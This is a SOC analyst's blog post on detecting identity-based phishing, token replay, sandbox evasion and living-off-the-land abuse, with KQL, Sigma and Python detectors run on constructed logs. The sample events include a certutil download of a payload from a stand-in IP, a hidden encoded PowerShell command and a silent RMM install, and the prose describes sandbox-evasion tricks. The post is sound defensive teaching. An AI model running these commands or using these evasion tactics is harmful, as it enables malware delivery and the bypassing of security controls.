Beyond the Inbox: 5 Counter-Intuitive Truths from the SOC Frontlines

About the Author
I am Prayush Hada, a SOC Analyst at CryptoGen Nepal. This post synthesizes my findings during my SOC internship, where I moved from following alerts to investigating the human logic behind them.
The Executive Summary (TL;DR)
In 2025, the "Security Stack" is no longer a wall; it’s a filter. As adversaries move toward Identity-centric attacks and LLM-assisted phishing, SOC analysts must stop looking for "bad files" and start hunting for "bad logic."
1. Phishing is Now an Identity & API Game
What it means: Modern phishing has moved to "Quishing" (QR-code lures that push the click onto an unmanaged personal phone, outside the gateway's URL scanning) and AiTM (Adversary-in-the-Middle) proxies that relay the real login page and capture the session cookie after MFA has been completed, so MFA on its own does not stop them. Why it matters: According to 2024 telemetry, 70% of successful breaches involved a human element, often via OAuth consent grants to attacker-controlled applications rather than traditional malware.
Investigator’s Checklist:
Check for anomalous Redirect URIs (reply URLs) on OAuth apps that received consent, especially a URL on a domain that has nothing to do with the app's displayed name.
Verify SPF/DKIM/DMARC alignment on messages that appear to come from internal "high-trust" senders; a spoofed internal address usually fails alignment even when the display name looks right.
Hunt for MFA Fatigue patterns (multiple denied pushes followed by an approved one).
Useful Logs:
AADSignInEventsBeta, CloudAppEvents (Microsoft 365 Defender advanced hunting); AuditLogs and SigninLogs (Entra ID diagnostics in Microsoft Sentinel).
Quick Hunt (KQL):
AuditLogs
| where OperationName == "Consent to application"
// TargetResources is dynamic; property names are case-sensitive (displayName, not DisplayName)
| extend AppName = tostring(TargetResources[0].displayName)
| extend ConsentingUser = tostring(InitiatedBy.user.userPrincipalName)
| where AppName has_any ("Reader", "Vault", "Encryption") // Common decoy names
| project TimeGenerated, ConsentingUser, AppName, Result
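The MFA Fatigue pattern from the checklist (several denied pushes, then an approval) is easy to describe and easy to get wrong in a query, so here is the detection logic run over a handful of constructed sign-in records. This is an added example, not code from the post; the records, account names and IPs are invented, and the result codes are an assumption about your schema (in Entra ID sign-in logs a push that was denied or timed out usually appears as ResultType 500121 and a completed MFA sign-in as 0).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in records (not a real export). Field order:
# (timestamp, user, result code, source IP). The codes below are an assumption
# about the Entra ID schema: 500121 = MFA challenge not satisfied, 0 = success.
MFA_DENIED, MFA_OK = "500121", "0"

SAMPLE_SIGNINS = [
    ("2025-03-04T01:12:05Z", "j.doe@example.com", MFA_DENIED, "203.0.113.10"),
    ("2025-03-04T01:12:40Z", "j.doe@example.com", MFA_DENIED, "203.0.113.10"),
    ("2025-03-04T01:13:20Z", "j.doe@example.com", MFA_DENIED, "203.0.113.10"),
    ("2025-03-04T01:14:02Z", "j.doe@example.com", MFA_DENIED, "203.0.113.10"),
    ("2025-03-04T01:15:30Z", "j.doe@example.com", MFA_OK,     "203.0.113.10"),
    # One mistyped prompt followed by a normal approval is not fatigue.
    ("2025-03-04T08:01:10Z", "a.rai@example.com", MFA_DENIED, "198.51.100.7"),
    ("2025-03-04T08:01:45Z", "a.rai@example.com", MFA_OK,     "198.51.100.7"),
    # Denials hours before the approval fall outside the look-back window.
    ("2025-03-03T22:00:00Z", "k.lama@example.com", MFA_DENIED, "192.0.2.44"),
    ("2025-03-03T22:00:30Z", "k.lama@example.com", MFA_DENIED, "192.0.2.44"),
    ("2025-03-03T22:01:00Z", "k.lama@example.com", MFA_DENIED, "192.0.2.44"),
    ("2025-03-04T09:30:00Z", "k.lama@example.com", MFA_OK,     "192.0.2.44"),
]


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_mfa_fatigue(events, min_denials=3, window=timedelta(minutes=15)):
    """Flag every MFA approval preceded by >= min_denials denials inside `window`.

    Returns one finding per suspicious approval: the user, when the approval
    happened, how many pushes were denied first, and the source IPs involved.
    """
    by_user = defaultdict(list)
    for ts, user, result, ip in events:
        by_user[user].append((_parse_ts(ts), result, ip))

    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e[0])  # chronological order per user
        for i, (approved_at, result, ip) in enumerate(evs):
            if result != MFA_OK:
                continue
            # Denials before this approval that still fall inside the window.
            denials = [e for e in evs[:i]
                       if e[1] == MFA_DENIED and approved_at - e[0] <= window]
            if len(denials) >= min_denials:
                findings.append({
                    "user": user,
                    "approved_at": approved_at.isoformat(),
                    "denials_before_approval": len(denials),
                    "first_denial": denials[0][0].isoformat(),
                    "source_ips": sorted({e[2] for e in denials} | {ip}),
                })
    return findings


if __name__ == "__main__":
    for finding in find_mfa_fatigue(SAMPLE_SIGNINS):
        print(finding)
```

The window and threshold are the two knobs worth tuning against your own baseline: a helpdesk-heavy tenant may legitimately see two or three denials from users fumbling a prompt, but a run of denials from one IP followed by an approval from the same IP is the case to escalate.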
2. Valid Credentials are the New Malware
What it means: Attackers don't break in; they log in. A stolen session cookie (cookie hijacking) is replayed against the service, so the MFA that was already satisfied when the cookie was issued is never challenged again. Why it matters: 2025 reports show a 40% increase in Session Token Theft. A successful login from a "Known Device" can still be an attacker replaying a token that was issued to that device.
Investigator’s Checklist:
Correlate Impossible Travel alerts with the Session ID: two distant geographies sharing one session ID points to token replay, whereas a fresh authentication from the new location is more likely a VPN or a traveling user.
Inspect User-Agent strings for small variations within a single session (a different browser build or OS for the same session ID is a sign that a second client is using the token).
Short Example: An analyst flagged a login from a "compliant device" in London. Investigation showed the session token had been captured by an AiTM reverse proxy ten minutes earlier in New York and replayed.
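To show the two checklist items together, the following added example (mine, not the post's) runs an impossible-travel calculation over constructed sign-in records and, for each hit, reports whether the two sign-ins share a session ID and whether the User-Agent changed mid-session. Coordinates, IPs, session IDs and the 900 km/h plausibility threshold are all assumptions of the example.

```python
import math
from datetime import datetime

# Constructed sign-in records (not a real export). Field order:
# (timestamp, user, session ID, source IP, city, latitude, longitude, User-Agent).
SAMPLE_SESSIONS = [
    ("2025-05-12T09:00:00Z", "s.thapa@example.com", "sess-7f3a", "198.51.100.23",
     "London", 51.5074, -0.1278,
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0.0.0"),
    # Same session ID seen ten minutes later on another continent with a slightly
    # different browser build: the signature of a replayed (stolen) token.
    ("2025-05-12T09:10:00Z", "s.thapa@example.com", "sess-7f3a", "203.0.113.77",
     "New York", 40.7128, -74.0060,
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/123.0.0.0"),
    # Ordinary travel: London in the morning, Paris eight hours later, new session.
    ("2025-05-12T07:30:00Z", "b.shrestha@example.com", "sess-11c0", "192.0.2.9",
     "London", 51.5074, -0.1278, "Mozilla/5.0 (Macintosh) Safari/605.1.15"),
    ("2025-05-12T15:30:00Z", "b.shrestha@example.com", "sess-2ee4", "192.0.2.120",
     "Paris", 48.8566, 2.3522, "Mozilla/5.0 (Macintosh) Safari/605.1.15"),
]

MAX_PLAUSIBLE_KMH = 900.0  # roughly airliner speed; anything faster is "impossible"


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_token_replay(events, max_kmh=MAX_PLAUSIBLE_KMH):
    """Compare each user's consecutive sign-ins and report impossible travel.

    Each finding records whether the two sign-ins share a session ID (token replay
    rather than a new authentication) and whether the User-Agent changed.
    """
    by_user = {}
    for ev in events:
        by_user.setdefault(ev[1], []).append(ev)

    findings = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e[0])  # ISO-8601 strings sort chronologically
        for prev, cur in zip(evs, evs[1:]):
            hours = (_parse_ts(cur[0]) - _parse_ts(prev[0])).total_seconds() / 3600
            km = haversine_km(prev[5], prev[6], cur[5], cur[6])
            if hours <= 0:
                speed = float("inf") if km > 0 else 0.0  # same second, two places
            else:
                speed = km / hours
            if speed <= max_kmh:
                continue
            findings.append({
                "user": user,
                "from": prev[4], "to": cur[4],
                "km": round(km), "kmh": round(speed),
                "same_session": prev[2] == cur[2],
                "ua_changed": prev[7] != cur[7],
                "ips": [prev[3], cur[3]],
            })
    return findings


if __name__ == "__main__":
    for finding in find_token_replay(SAMPLE_SESSIONS):
        print(finding)
```

The useful part of the output is not the speed figure but the two booleans: same_session=True with ua_changed=True is the combination that should jump the queue, because it says the token, not the password, is what moved.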
3. Alerts are Signals, Not Stories
What it means: A "Low" severity alert (a single failed login, say) is often the precursor to a "Critical" event. Why it matters: Attackers "warm up" environments by testing how, and how quickly, automation responds. If you only look at "High" alerts, you miss the reconnaissance phase.
Investigator’s Checklist:
Build a timeline covering the 30 minutes before and after the alert, on the same account and host.
Map alerts to the MITRE ATT&CK framework to see the "missing links."
Quick Playbook Line: If a "Low" alert involves a privileged account, escalate to "Medium" immediately for manual review.
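The two checklist items above and the playbook line are a procedure; here it is as one added example (mine, not the post's) run over a constructed alert stream. The alert names, the "svc-backup" privileged account and the 30-minute window are assumptions; the escalation function implements the playbook line exactly as stated.

```python
from datetime import datetime, timedelta

# Constructed alert stream (not a real SIEM export). Field order:
# (alert ID, timestamp, severity, account, title).
SAMPLE_ALERTS = [
    ("A-100", "2025-06-02T13:02:00Z", "Low",    "svc-backup", "Failed login"),
    ("A-101", "2025-06-02T13:04:00Z", "Low",    "svc-backup", "Failed login"),
    ("A-102", "2025-06-02T13:20:00Z", "Medium", "svc-backup", "New inbox rule created"),
    ("A-103", "2025-06-02T13:31:00Z", "High",   "svc-backup", "Mass file download"),
    ("A-104", "2025-06-02T14:15:00Z", "Low",    "svc-backup", "Failed login"),  # outside window
    ("A-105", "2025-06-02T13:10:00Z", "Low",    "intern01",   "Failed login"),  # other account
]

# Assumed list of privileged identities; in practice pull this from your PIM/AD groups.
PRIVILEGED_ACCOUNTS = {"svc-backup", "da-admin"}


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def build_timeline(alerts, anchor_id, minutes=30):
    """Return the anchor alert plus every alert on the same account within +/- minutes.

    Each row carries its offset from the anchor so the analyst reads the story
    (Low, Low, Medium, High) rather than the single alert that paged them.
    """
    anchor = next(a for a in alerts if a[0] == anchor_id)
    t0, window = _ts(anchor[1]), timedelta(minutes=minutes)
    rows = [a for a in alerts if a[3] == anchor[3] and abs(_ts(a[1]) - t0) <= window]
    rows.sort(key=lambda a: a[1])
    return [{"id": a[0],
             "offset_min": int((_ts(a[1]) - t0).total_seconds() // 60),
             "severity": a[2], "title": a[4]} for a in rows]


def triage_severity(alert, privileged=PRIVILEGED_ACCOUNTS):
    """Playbook line from the post: a Low alert on a privileged account is worked as Medium."""
    severity, account = alert[2], alert[3]
    if severity == "Low" and account in privileged:
        return "Medium"
    return severity


if __name__ == "__main__":
    for row in build_timeline(SAMPLE_ALERTS, "A-103"):
        print(f"{row['offset_min']:+4d} min  {row['severity']:<7} {row['title']}")
```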
4. Automation Bypasses: The "Sleep" and "Password" Tactics
What it means: Attackers exploit the non-interactive, time-boxed nature of automated sandboxes. Why it matters: Most automated gateways won't wait more than 120 seconds for a payload to detonate, so a sleep(300) before the malicious stage is enough. Because many sandboxes now fast-forward plain sleeps, samples also stall with long computation loops or compare the wall clock before and after the sleep to detect that it was skipped.
Investigator’s Checklist:
Check for password-protected ZIPs where the password is in the email body: the gateway can't open the archive, and it doesn't correlate the text of the message with the attachment, so the contents are never inspected.
Analyze files in Interactive Sandboxes where you can manually click buttons or wait out timers.
Short Example: A PDF appeared clean in the sandbox. When opened manually, it required a "CAPTCHA" click to reveal the malicious URL, a simple human action that defeated the automation.
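The password-in-the-body tactic is the one checklist item a script can actually close: pull password-looking strings out of the message text and try them against any encrypted ZIP attachment. The following is an added example (mine, not the post's) that does exactly that. Because the standard library cannot write encrypted archives, the block also contains a small ZipCrypto writer used only to construct the sample attachment; the e-mail body, the member name "Invoice_2025.pdf.js" and the payload bytes are invented.

```python
import io
import re
import struct
import zipfile
import zlib

# Constructed phishing e-mail body (hypothetical). The archive password is disclosed
# in the text, which is exactly what the gateway does not correlate with the attachment.
EMAIL_BODY = """Hi,
Please find the signed invoice attached.
The archive password is Inv0ice#2025 (for your security).
Regards,
Accounts Payable
"""

PASSWORD_PATTERN = re.compile(r"(?i)password\s*(?:is|:)\s*[\"']?([^\s\"'(),]+)")
SUSPICIOUS_MEMBER_EXT = (".exe", ".js", ".vbs", ".hta", ".lnk", ".iso", ".scr", ".bat")


def extract_password_candidates(body):
    """Return distinct strings that look like a disclosed archive password."""
    found = []
    for m in PASSWORD_PATTERN.finditer(body):
        if m.group(1) not in found:
            found.append(m.group(1))
    return found


class _ZipCryptoKeys:
    """Traditional PKWARE (ZipCrypto) key schedule; used here only to build the sample."""

    def __init__(self, password):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for c in password:
            self.update(c)

    @staticmethod
    def _crc32(key, c):
        # Raw table-driven CRC step without zlib's pre/post inversion.
        return zlib.crc32(bytes([c]), key ^ 0xFFFFFFFF) ^ 0xFFFFFFFF

    def update(self, c):
        k0, k1, k2 = self.k
        k0 = self._crc32(k0, c)
        k1 = (k1 + (k0 & 0xFF)) & 0xFFFFFFFF
        k1 = (k1 * 134775813 + 1) & 0xFFFFFFFF
        k2 = self._crc32(k2, k1 >> 24)
        self.k = [k0, k1, k2]

    def encrypt(self, plaintext):
        out = bytearray()
        for p in plaintext:
            t = (self.k[2] | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self.update(p)  # keys advance on the plaintext byte
        return bytes(out)


def build_zipcrypto_zip(member_name, data, password):
    """Write a single-member, stored (uncompressed), ZipCrypto-encrypted ZIP in memory."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header; readers check that its last byte equals the CRC's high byte.
    header = bytes(range(11)) + bytes([(crc >> 24) & 0xFF])
    body = _ZipCryptoKeys(password.encode()).encrypt(header + data)
    flags, method, mtime, mdate = 0x0001, 0, 0, 23073  # bit 0 = encrypted; date 2025-01-01
    name = member_name.encode()
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, method, mtime, mdate,
                        crc, len(body), len(data), len(name), 0) + name + body
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, method,
                          mtime, mdate, crc, len(body), len(data), len(name),
                          0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def triage_email(body, attachments):
    """For each ZIP attachment, try every password candidate found in the body.

    Returns {attachment name: finding}: whether the member was encrypted, which
    candidate opened it, its content, and whether the member name carries an
    extension the gateway would have blocked had it been able to look inside.
    """
    candidates = extract_password_candidates(body)
    findings = {}
    for att_name, blob in attachments.items():
        if not blob.startswith(b"PK\x03\x04"):
            continue
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                finding = {"member": info.filename,
                           "encrypted": bool(info.flag_bits & 0x1),
                           "opened_with": None, "content": None,
                           "suspicious_member": info.filename.lower().endswith(SUSPICIOUS_MEMBER_EXT)}
                for pwd in (candidates if finding["encrypted"] else [None]):
                    try:
                        finding["content"] = zf.read(info, pwd=pwd.encode() if pwd else None)
                        finding["opened_with"] = pwd
                        break
                    except (RuntimeError, zipfile.BadZipFile):
                        continue  # wrong password: header check byte or CRC mismatch
                findings[att_name] = finding
    return findings


# Constructed attachment: a double-extension script protected with the disclosed password.
SAMPLE_PAYLOAD = b"WScript.Echo \"stand-in for a malicious script\"\r\n"
SAMPLE_ATTACHMENTS = {
    "Invoice.zip": build_zipcrypto_zip("Invoice_2025.pdf.js", SAMPLE_PAYLOAD, "Inv0ice#2025"),
}
```

A wrong password is rejected by the one-byte header check 255 times out of 256 and by the CRC otherwise, which is why both RuntimeError and BadZipFile are caught. In a real triage pipeline the content returned here would be handed to the interactive sandbox from the next checklist item rather than executed.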
5. Hiding in Plain Sight (LOLBAS)
What it means: Using Living Off the Land Binaries and Scripts (LOLBAS) such as certutil.exe or powershell.exe to download payloads or exfiltrate data. Why it matters: These are signed, "trusted" Microsoft tools. Seeing them run isn't an alert; seeing them run with unusual arguments (certutil fetching a URL, PowerShell with an encoded command and a hidden window) is.
Investigator’s Checklist:
Monitor Event ID 4104 (PowerShell Script Block Logging in the Microsoft-Windows-PowerShell/Operational log); it records the script content after decoding, so an -EncodedCommand on the command line does not hide it.
Look for "dual-use" tools (RMM software such as AnyDesk or ScreenConnect) being installed on servers where no remote-support workflow exists.
Quick Hunt (Sigma):
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains: '-urlcache'
  condition: selection
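To make the Sigma rule above concrete, the following added example (mine, not the post's) evaluates it, plus two companion rules in the same notation for the PowerShell and RMM cases from the checklist, over constructed process-creation events. The matcher implements the Sigma semantics that matter here: field modifiers (endswith, startswith, contains), case-insensitive comparison, and list values OR'ed unless the all modifier is present. Host names, paths, the encoded-command string and the ScreenConnect installer file name are assumptions.

```python
# Constructed process-creation events (not from a real host). Field names follow
# the Sigma process_creation field set (Image, CommandLine, ComputerName).
SAMPLE_EVENTS = [
    {"ComputerName": "WS-042", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://198.51.100.5/p.txt C:\\Users\\Public\\p.exe"},
    {"ComputerName": "WS-042", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile C:\\installer.msi SHA256"},  # benign admin use
    {"ComputerName": "WS-017",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ComputerName": "SRV-DB01", "Image": r"C:\Users\admin\Downloads\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe --install \"C:\\Program Files\\AnyDesk\" --silent"},
    {"ComputerName": "WS-017", "Image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe"},  # already-installed client on a workstation
]

# Rules written as Sigma "selection" maps. The first is the post's rule verbatim;
# the other two are this example's additions.
RULES = [
    {"title": "Certutil download via -urlcache",
     "selection": {"Image|endswith": "\\certutil.exe",
                   "CommandLine|contains": "-urlcache"}},
    {"title": "PowerShell encoded command with hidden window",
     "selection": {"Image|endswith": "\\powershell.exe",
                   "CommandLine|contains|all": ["-enc", "-w hidden"]}},
    {"title": "RMM installer executed on a server",
     "selection": {"Image|endswith": ["\\AnyDesk.exe", "\\ScreenConnect.ClientSetup.exe"],
                   "CommandLine|contains": "--install",
                   "ComputerName|startswith": "SRV-"}},  # assumed server naming convention
]


def _field_matches(value, spec, modifiers):
    """Sigma semantics: case-insensitive; a list is OR'ed unless 'all' is present."""
    value = value.lower()
    wanted = [w.lower() for w in (spec if isinstance(spec, list) else [spec])]
    if "endswith" in modifiers:
        tests = [value.endswith(w) for w in wanted]
    elif "startswith" in modifiers:
        tests = [value.startswith(w) for w in wanted]
    elif "contains" in modifiers:
        tests = [w in value for w in wanted]
    else:
        tests = [value == w for w in wanted]
    return all(tests) if "all" in modifiers else any(tests)


def matches(rule, event):
    """All keys of a selection map must match (Sigma AND within a selection)."""
    for key, spec in rule["selection"].items():
        field, *modifiers = key.split("|")
        if not _field_matches(str(event.get(field, "")), spec, modifiers):
            return False
    return True


def run_rules(rules, events):
    """Return (event index, rule title, host) for every rule hit."""
    hits = []
    for i, event in enumerate(events):
        for rule in rules:
            if matches(rule, event):
                hits.append((i, rule["title"], event["ComputerName"]))
    return hits


if __name__ == "__main__":
    for hit in run_rules(RULES, SAMPLE_EVENTS):
        print(hit)
```

The benign certutil -hashfile event and the already-installed AnyDesk client on a workstation are there on purpose: the post's point is that the binary is not the signal, the argument pattern and the context (a server, an installer flag) are.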
Conclusion: What to Change This Week
The technical stack will always evolve, but human reasoning is the constant. Shift your focus from "detecting badness" to "understanding normal."
Three immediate actions for your team:
Audit OAuth Consents: Run a report on all third-party apps with Mail.Read or Files.Read permissions.
Hunt for Mailbox Rules: Search for rules that move items to "Deleted Items" or "RSS Feeds", a classic sign of an ongoing BEC.
Validate Conditional Access: Ensure "Impossible Travel" triggers a re-authentication or a block.
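The first two actions are both "run this over the tenant and read the exceptions", so here they are as one added example (mine, not the post's) over constructed data: an inbox-rule hunt that looks for the hiding behaviours named above, and an OAuth grant audit that flags the Mail.Read and Files.Read family of scopes. Field names loosely follow Exchange Online's Get-InboxRule output and the space-separated scope string of an OAuth2 permission grant; the mailboxes, app names, the "example.com" internal domain and the folder and keyword lists are all assumptions.

```python
# Constructed inbox rules (not a tenant export); field names loosely follow Get-InboxRule.
SAMPLE_INBOX_RULES = [
    {"Mailbox": "cfo@example.com", "Name": ".", "Enabled": True,
     "SubjectContainsWords": ["invoice", "payment", "wire"],
     "MoveToFolder": "RSS Feeds", "DeleteMessage": False, "ForwardTo": None},
    {"Mailbox": "cfo@example.com", "Name": "Newsletters", "Enabled": True,
     "SubjectContainsWords": ["newsletter"],
     "MoveToFolder": "Reading", "DeleteMessage": False, "ForwardTo": None},
    {"Mailbox": "ap@example.com", "Name": "fwd", "Enabled": True,
     "SubjectContainsWords": [],
     "MoveToFolder": None, "DeleteMessage": True, "ForwardTo": "ap.backup@mail-example.net"},
]

# Constructed OAuth grants (not a tenant export); "scope" is the space-separated scope string.
SAMPLE_GRANTS = [
    {"app": "Contoso CRM Connector", "publisher_verified": True,
     "consent_type": "AllPrincipals", "scope": "User.Read offline_access"},
    {"app": "Encryption Reader", "publisher_verified": False,
     "consent_type": "Principal", "principal": "cfo@example.com",
     "scope": "User.Read Mail.Read offline_access"},
    {"app": "OneDrive Sync Helper", "publisher_verified": False,
     "consent_type": "Principal", "principal": "a.rai@example.com",
     "scope": "Files.Read.All"},
]

HIDING_FOLDERS = {"deleted items", "rss feeds", "rss subscriptions", "junk email",
                  "archive", "conversation history"}
BEC_KEYWORDS = {"invoice", "payment", "wire", "bank", "password", "urgent", "phish", "hacked"}
INTERNAL_DOMAINS = {"example.com"}  # assumed; anything else counts as external
SENSITIVE_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Files.Read", "Files.Read.All",
                    "Files.ReadWrite", "Files.ReadWrite.All"}


def assess_inbox_rule(rule):
    """Return (hiding actions, supporting indicators) for one rule."""
    actions, indicators = [], []
    folder = (rule.get("MoveToFolder") or "").lower()
    if folder in HIDING_FOLDERS:
        actions.append(f"moves mail to '{rule['MoveToFolder']}'")
    if rule.get("DeleteMessage"):
        actions.append("deletes messages")
    fwd = rule.get("ForwardTo")
    if fwd and fwd.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS:
        actions.append(f"forwards externally to {fwd}")
    keywords = {w.lower() for w in rule.get("SubjectContainsWords") or []} & BEC_KEYWORDS
    if keywords:
        indicators.append("keyword trigger: " + ", ".join(sorted(keywords)))
    if not rule.get("Name", "").strip(". ,_-"):
        indicators.append("near-empty rule name")  # attackers often name rules '.' or ','
    return actions, indicators


def hunt_inbox_rules(rules):
    """Report enabled rules that hide or divert mail; indicators only add context."""
    findings = []
    for rule in rules:
        actions, indicators = assess_inbox_rule(rule)
        if rule.get("Enabled", True) and actions:
            findings.append({"mailbox": rule["Mailbox"], "name": rule["Name"],
                             "actions": actions, "indicators": indicators})
    return findings


def audit_oauth_grants(grants):
    """Report grants carrying mail/file read scopes; offline_access makes them persistent."""
    findings = []
    for grant in grants:
        scopes = set(grant["scope"].split())
        sensitive = sorted(scopes & SENSITIVE_SCOPES)
        if not sensitive:
            continue
        findings.append({"app": grant["app"], "sensitive_scopes": sensitive,
                         "persistent": "offline_access" in scopes,
                         "unverified_publisher": not grant["publisher_verified"],
                         "who": grant.get("principal", "all users")})
    return findings


if __name__ == "__main__":
    for f in hunt_inbox_rules(SAMPLE_INBOX_RULES) + audit_oauth_grants(SAMPLE_GRANTS):
        print(f)
```

The grant audit deliberately treats offline_access as an amplifier rather than a trigger: it is harmless on its own, but combined with Mail.Read it gives the attacker a refresh token that outlives the phished session, which is the OAuth analogue of the token theft in section 2.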